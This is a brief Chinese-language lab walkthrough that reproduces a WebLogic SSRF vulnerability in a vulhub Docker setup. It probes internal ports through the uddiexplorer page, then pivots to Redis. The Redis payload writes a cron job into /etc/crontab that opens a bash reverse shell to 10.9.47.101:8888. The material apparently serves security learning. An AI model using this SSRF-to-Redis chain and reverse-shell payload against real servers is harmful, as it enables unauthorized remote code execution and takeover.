WebLogic SSRF 漏洞复现
环境搭建
vim docker-compose.yml
version: '2'
services:
weblogic:
image: vulhub/weblogic:10.3.6.0-2017
depends_on:
- redis
ports:
- "7001:7001"
redis:
image: vulhub/baselinux:centos-6
sudo docker-compose up -d
漏洞复现
端口探测
搭建成功后访问
kali的ip:7001/uddiexplorer/SearchPublicRegistries.jsp
漏洞点存在于此网页
点击 serach,抓包
更改请求的 url,查看回显
访问开启的端口报错
如果访问的非http协议,则会返回did not have a valid SOAP content-type
。
访问关闭的端口报错
Radies 反弹 shell
查看 Radies ip,Radies 数据库默认端口为 6379
sudo docker ps -a
sudo docker exec -it d250fa8fcafa ip addr
访问该端口,报错信息表示端口开启
编写反弹 shell 脚本
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.47.101/8888 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
url 编码,发送
kali 开启监听
成功反弹